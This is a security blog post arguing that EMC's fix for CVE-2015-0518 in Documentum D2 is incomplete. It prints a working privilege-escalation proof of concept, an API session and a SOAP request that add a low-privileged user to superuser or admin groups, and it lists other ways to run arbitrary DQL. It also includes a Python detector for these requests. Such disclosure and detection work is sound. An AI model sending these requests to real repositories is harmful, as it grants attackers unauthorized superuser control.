CVE-2015-0518. Was it really fixed?

Three weeks ago EMC announced CVE-2015-0518:

A method in the Properties service of the D2FS web service component may allow a low privileged D2 user to manipulate group permissions and obtain superuser privileges.

You can find the related PoC in Second dive into D2 security. This vulnerability is also mentioned in CERT’s spreadsheet. If you were lucky and were able to download the first version of CERT’s spreadsheet (otherwise you can find it here), you can find the following EMC comment about this vulnerability:

It appears that the fixed releases communicated for this issue were incorrect. This has not been fixed because the vulnerability described in PSRC-2105 (D2 configuration objects not being protected with ACLs) on which it relies has not been fixed yet. However, fixing the latter will be a major undertaking and it has been decided by D2 Product Management that it will not be fixed in the next release of D2 (currently versioned as 4.2.1) scheduled GA in 2015 Q2 due to resource constraints. The remediation plan here then is to fix PSRC-2105 in 2015 after the upcoming D2 4.2.1 release.

So, besides the fact that D2 actively uses docbase methods (which are insecure, unreliable, etc.), it also does not protect its config objects from being edited by regular users – I bet such a weird implementation was caused by misleading performance tips from EMC:

What really happened with CVE-2015-0518? EMC fixed the PoC described in Second dive into D2 security; the “new” PoC (the previous one just truncated the value of the node_admin_security_group attribute in the d2_options object) is:

api:

API> retrieve,c,d2_options
...
000224838000012c
API> dump,c,l
...
USER ATTRIBUTES

...

  node_admin_security_group       : admingroup

...

API> set,c,l,node_user_security_group
SET> <any group attacker belongs to>
...
OK
API> save,c,l
...
OK

soap:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:con="http://www.emc.com/d2fs/services/content_service"
                  xmlns:com="http://www.emc.com/d2fs/models/common"
                  xmlns:prop="http://www.emc.com/d2fs/services/property_service"
                  xmlns:att="http://www.emc.com/d2fs/models/attribute"
                  xmlns:con1="http://www.emc.com/d2fs/models/context">
   <soapenv:Header/>
   <soapenv:Body>
      <prop:savePropertiesRequest com:id="1102248380000541">
         <con1:context uid="2" login="hacker" password="hacker">
            <con1:repository com:id="2" repositoryName="d2" serverVersion="7"
                             repositoryType="DOCUMENTUM" hideDomain="true"/>
         </con1:context>
         <!--Zero or more repetitions:-->
         <att:attributes name="list" type="2" value="group_membership" />
         <att:attributes name="user_group_name" type="2" value="dm_superusers" />
      </prop:savePropertiesRequest>
   </soapenv:Body>
</soapenv:Envelope>
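For the defending side, an added example (not from the original post, and not EMC's or D2's code) that reviews captured D2FS request bodies, e.g. from a reverse proxy that logs SOAP payloads, for the two write patterns this post shows: a group_membership write into a privileged group and a write to the security-group attributes of d2_options. The SOAP samples are constructed and the set of privileged groups is an assumption to adapt per repository.

```python
# Added example: flag D2FS savePropertiesRequest bodies that touch privileged
# group settings. Uses only the Python standard library; sample bodies are constructed.
import xml.etree.ElementTree as ET

NS = {
    "soapenv": "http://schemas.xmlsoap.org/soap/envelope/",
    "prop": "http://www.emc.com/d2fs/services/property_service",
    "att": "http://www.emc.com/d2fs/models/attribute",
    "con1": "http://www.emc.com/d2fs/models/context",
}
# Assumption: groups whose membership should never change through the property service.
PRIVILEGED_GROUPS = {"dm_superusers", "admingroup"}
# d2_options attributes that decide who administers D2 (named in the post).
SENSITIVE_ATTRS = {"node_admin_security_group", "node_user_security_group"}


def review_request(body):
    """Return (login, findings) for one SOAP body; findings is empty when clean."""
    root = ET.fromstring(body)
    ctx = root.find(".//con1:context", NS)
    login = ctx.get("login") if ctx is not None else None
    findings = []
    for req in root.iterfind(".//prop:savePropertiesRequest", NS):
        attrs = {a.get("name"): a.get("value") for a in req.iterfind("att:attributes", NS)}
        # Pattern 1: list=group_membership together with a privileged user_group_name.
        if attrs.get("list") == "group_membership" and attrs.get("user_group_name") in PRIVILEGED_GROUPS:
            findings.append("group_membership write to " + attrs["user_group_name"])
        # Pattern 2: any write to the d2_options security-group attributes.
        for name in sorted(SENSITIVE_ATTRS & set(attrs)):
            findings.append("write to d2_options." + name)
    return login, findings


def review_capture(bodies):
    """Return [(login, findings)] for every captured body that produced a finding."""
    return [(l, f) for l, f in map(review_request, bodies) if f]


# Constructed minimal envelope with the post's namespaces; {inner} holds the attributes.
ENVELOPE = ('<soapenv:Envelope xmlns:soapenv="{soapenv}" xmlns:prop="{prop}" '
            'xmlns:att="{att}" xmlns:con1="{con1}"><soapenv:Body>'
            '<prop:savePropertiesRequest><con1:context login="hacker"/>{inner}'
            '</prop:savePropertiesRequest></soapenv:Body></soapenv:Envelope>')


def sample(inner):
    return ENVELOPE.format(inner=inner, **NS)


ESCALATION = sample('<att:attributes name="list" type="2" value="group_membership"/>'
                    '<att:attributes name="user_group_name" type="2" value="dm_superusers"/>')
BENIGN = sample('<att:attributes name="title" type="2" value="Quarterly report"/>')

if __name__ == "__main__":
    for login, findings in review_capture([ESCALATION, BENIGN]):
        print("ALERT login=%s: %s" % (login, "; ".join(findings)))
```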

Actually, you may ask how a regular user can modify a docbase object in D2 that is not exposed through the D2 interface; the possible options are:

  • through a direct connection to Content Server, if available
  • through DFS, if available
  • through a WDK application – the DQL editor is not the only way to execute a DQL query in WDK applications
  • through D2-Config – it has a GetData servlet, which allows executing an arbitrary DQL query
